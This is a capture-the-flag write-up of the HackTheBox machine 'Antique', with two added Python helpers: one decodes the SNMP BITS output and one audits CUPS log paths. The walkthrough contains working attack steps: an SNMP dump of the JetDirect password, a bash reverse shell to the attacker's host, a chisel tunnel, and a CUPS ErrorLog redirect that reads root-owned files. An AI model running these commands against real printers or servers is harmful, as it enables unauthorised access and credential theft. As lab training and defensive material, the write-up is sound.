HTB: Antique

Enumeration

I ran nmap and found only port 23 open.

┌─[]─[user@parrot]─[~/htb/antique]
└──╼ ports=$(nmap -p- -T4 -Pn -n 10.129.106.56 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
┌─[user@parrot]─[~/htb/antique]
└──╼ echo $ports 
23
┌─[user@parrot]─[~/htb/antique]
└──╼ nmap -sC -sV -Pn -p$ports 10.129.106.56
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 11:00 BST
Nmap scan report for 10.129.106.56
Host is up (0.038s latency).

PORT   STATE SERVICE VERSION
23/tcp open  telnet?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270: 
|     JetDirect
|     Password:
|   NULL: 
|_    JetDirect

User flag

A quick search on Google reveals that HP JetDirect is a printer, and turns up a vulnerability: CVE-2017-2741.

Searching further for this vulnerability and how to exploit it, I found this page, which explains how to attack an HP JetDirect printer and dump its password.

First I confirmed that SNMP is running on port 161/udp:

┌─[user@parrot]─[~/htb/antique/exploits]
└──╼ sudo nmap -sV -sC -sU -p161,162 10.129.106.56
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 13:00 BST
Nmap scan report for 10.129.106.56
Host is up (0.039s latency).

PORT    STATE  SERVICE  VERSION
161/udp open   snmp     SNMPv1 server (public)
162/udp closed snmptrap

SNMPv1 is running, so I tried to dump the password by running the command from the page linked above:

┌─[user@parrot]─[~]
└──╼ snmpget -v2c -c public 10.129.106.56 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

It seems that the command worked and dumped the password in hexadecimal. I converted the hex to ASCII with the xxd command; you can use any online hex/ASCII converter or CyberChef instead, it is just personal preference.

┌─[user@parrot]─[~]
└──╼ echo "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135" | xxd -r -p
P@ssw0rd@123!!123�q��"2Rbs3CSs��$4�Eu�WGW�(8i	IY�aA�"1&1A5
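The trailing garbage after the password in the xxd output is not part of the secret: net-snmp prints a BITS value as the hex octets followed by the decimal numbers of every bit that is set, and piping the whole line through `xxd -r -p` decodes those bit numbers as if they were more hex. The following added example (my own code, not from the writeup or from net-snmp) parses the snmpget line shown above and finds the split point by recomputing the set-bit list from the octets, so the password comes out clean. The only input is the value copied from the page's snmpget output.

```python
import string

# Value copied from the snmpget output above (the page's own data, not constructed),
# exactly as net-snmp printed it: hex octets, then the numbers of the bits that are set.
SNMP_LINE = (
    "iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 "
    "33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 "
    "74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135"
)


def set_bit_indices(octets: bytes) -> list:
    """Bit numbers that are set, counting bit 0 as the MSB of the first octet (SMI BITS order)."""
    return [i * 8 + b for i, o in enumerate(octets) for b in range(8) if o & (0x80 >> b)]


def parse_bits_value(value: str) -> bytes:
    """Recover the raw octets from net-snmp's BITS display: '<hex octets> <set bit numbers>'.

    The split point is validated by recomputing the bit list from the candidate octets,
    so a token such as '33' that is both valid hex and a plausible bit number cannot be
    assigned to the wrong side."""
    tokens = value.split()
    for k in range(len(tokens), 0, -1):
        head, tail = tokens[:k], tokens[k:]
        if not all(len(t) == 2 and all(c in string.hexdigits for c in t) for t in head):
            continue
        if not all(t.isdigit() for t in tail):
            continue
        octets = bytes(int(t, 16) for t in head)
        if [int(t) for t in tail] == set_bit_indices(octets):
            return octets
    raise ValueError("not a well-formed net-snmp BITS value")


def parse_snmp_line(line: str) -> bytes:
    """Handle a full 'OID = BITS: ...' line as printed by snmpget."""
    _, _, rest = line.partition("= BITS:")
    if not rest:
        raise ValueError("line does not carry a BITS value")
    return parse_bits_value(rest)


def printable_prefix(octets: bytes) -> str:
    """Decode as ASCII and stop at the first non-printable byte (padding or a binary tail)."""
    out = []
    for b in octets:
        if 0x20 <= b < 0x7F:
            out.append(chr(b))
        else:
            break
    return "".join(out)


if __name__ == "__main__":
    raw = parse_snmp_line(SNMP_LINE)
    print(raw.hex(" "), "->", printable_prefix(raw))
```

Run stand-alone it prints the 17 octets and the decoded string; all 17 bytes are printable, so the whole BITS payload is the password and everything xxd produced after it came from the bit-index list.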

Now that I know the password, I connected via telnet and got the user flag:

┌─[✗]─[user@parrot]─[~/htb/antique]
└──╼ telnet 10.129.106.56
Trying 10.129.106.56...
Connected to 10.129.106.56.
Escape character is '^]'.

HP JetDirect

Password: P@ssw0rd@123!!123

Please type "?" for HELP
> exec whoami
lp
> exec ls
telnet.py
user.txt
> 

Root flag

For convenience I want a real shell, so let's run a reverse shell on the target.

> exec bash -c 'bash -i >& /dev/tcp/10.10.14.93/4444 0>&1'
 

I received the shell on the netcat listener and upgraded it:

┌─[user@parrot]─[~]
└──╼ nc -lnvvp 4444
[...]
lp@antique:~$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
lp@antique:~$ export TERM=xterm
export TERM=xterm
lp@antique:~$ ^Z
[1]+  Stopped                 nc -lnvvp 4444
┌─[✗]─[user@parrot]─[~]
└──╼ stty raw -echo; fg
lp@antique:~$

After running linpeas.sh I found port 631 open, listening only on localhost:

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      1149/python3        
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 ::1:631                 :::*                    LISTEN      -   

There are other privilege escalation options, such as the sudo version or polkit (CVE-2021-4034), but the machine creator probably wants us to explore port 631, so let's do that.

I used chisel, a tool that lets us set up a tunnel to the target machine. First I downloaded the binary and copied it to the target:

┌─[user@parrot]─[~]
└──╼ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
[...]
┌─[user@parrot]─[~]
└──╼ gunzip chisel_1.7.7_linux_amd64.gz
[...]
┌─[user@parrot]─[~]
└──╼ python3 -m http.server 8080

# download it on the target
lp@antique:~$ wget http://10.10.14.93:8080/chisel_1.7.7_linux_amd64
[...]

Now that the target has the binary, I will create the tunnel. First I started a chisel server on my machine:

# on my machine
┌─[user@parrot]─[~]
└──╼ ./chisel_1.7.7_linux_amd64 server -p 9000 --reverse

This way the chisel server listens on port 9000, and the --reverse flag allows reverse tunnels, so that a client can open a listening port on our machine. Now I connect from the target:

# on the target
lp@antique:~$ ./chisel_1.7.7_linux_amd64 client 10.10.14.93:9000 R:9001:localhost:631

On the client side (the target), we tell chisel to connect to our machine at 10.10.14.93:9000 and to open a listening port on my machine, port 9001 (“R:9001:localhost:631”, a reverse tunnel). Any traffic that hits port 9001 on my machine is forwarded by chisel to the target and delivered to port 631 on the target's own localhost.

Now we can reach the web page by browsing to “localhost:9001”.

The target is hosting CUPS, an open-source printing system. I also noticed that the CUPS version is 1.6.1.

I searched for vulnerabilities in CUPS 1.6.1 and found this page, which explains a root file read vulnerability.

It says it is necessary to be in the “lpadmin” group to exploit this vulnerability, so I checked whether the user lp is in that group.

lp@antique:~$ groups
lp lpadmin

The user is in the “lpadmin” group, so I can exploit the vulnerability as this user.

This vulnerability consists in changing the ErrorLog path: when we visit the error log page on the web interface, the cupsd daemon (running with root privileges) reads the file at the ErrorLog path and echoes it as plain text. I will point it at the root flag and make CUPS echo that file.

I searched on Metasploit and found this module. Looking at it, I noticed it runs the following command to change the Error Log file:

lp@antique:~$ cupsctl ErrorLog=/root/root.txt

Next, the exploit makes a request to the web interface, which shows the content of the Error Log file, so I can make the same request with curl and check the output:

lp@antique:~$ curl http://localhost:631/admin/log/error_log
b6791365258a05b70f09ec24e27630de

Cool! That’s the flag! 🙂
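From the defender's side, the whole chain above hinges on a log directive that a non-root lpadmin user could point at an arbitrary file, which is why later CUPS releases moved the file-location directives out of cupsd.conf into cups-files.conf, where cupsctl cannot rewrite them. The following added example (my own code, not from the writeup, the Metasploit module or the CUPS project) is a small audit that parses cupsd.conf-style text and flags any ErrorLog, AccessLog or PageLog directive whose resolved path is not under /var/log/cups, catching both a direct rewrite like `cupsctl ErrorLog=/root/root.txt` and a `..` traversal. The configuration it checks is a constructed sample, and the directive names, the log directory and the treatment of `syslog` as an allowed non-file value are my assumptions about a default CUPS setup.

```python
import posixpath

# Directives that name files cupsd opens as root; these are the ones a cupsctl call
# could redirect on a 1.6.1-era cupsd. Compared case-insensitively (assumption:
# CUPS directive names are not case-sensitive).
FILE_DIRECTIVES = {"errorlog", "accesslog", "pagelog"}
ALLOWED_LOG_DIR = "/var/log/cups"

# Constructed sample configuration (not the machine's real cupsd.conf), with the
# ErrorLog line rewritten the way `cupsctl ErrorLog=/root/root.txt` would leave it.
SAMPLE_CONF = """\
# constructed cupsd.conf excerpt
ServerRoot /etc/cups
LogLevel warn
AccessLog /var/log/cups/access_log
ErrorLog /root/root.txt
PageLog syslog
<Location />
  Order allow,deny
</Location>
"""


def parse_cups_conf(text: str):
    """Yield (directive, value) pairs from cupsd.conf-style text.

    One directive per line, '#' starts a comment, and section tags such as
    <Location /> are skipped (their inner lines are still yielded)."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("<"):
            continue
        parts = line.split(None, 1)
        if len(parts) == 2:
            yield parts[0], parts[1].strip()


def audit_log_paths(text: str, allowed_dir: str = ALLOWED_LOG_DIR) -> list:
    """Return (directive, value, reason) for every log file outside allowed_dir.

    'syslog' is a legitimate non-file value for these directives and is accepted.
    Paths are normalised first so '/var/log/cups/../../../etc/shadow' is judged by
    where it really ends up."""
    findings = []
    prefix = allowed_dir.rstrip("/") + "/"
    for directive, value in parse_cups_conf(text):
        if directive.lower() not in FILE_DIRECTIVES or value == "syslog":
            continue
        if not value.startswith("/"):
            findings.append((directive, value, "relative path, not anchored under the log directory"))
            continue
        resolved = posixpath.normpath(value)
        if not resolved.startswith(prefix):
            findings.append((directive, value, f"points outside {allowed_dir}: {resolved}"))
    return findings


if __name__ == "__main__":
    for directive, value, reason in audit_log_paths(SAMPLE_CONF):
        print(f"{directive} = {value}: {reason}")
```

Run against the live file (`/etc/cups/cupsd.conf`, or `cupsctl` output on an affected version) this is a quick way to spot that a print daemon has been turned into a file reader; a non-default log path on a box where only lpadmin users can write the configuration is the thing to alert on.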
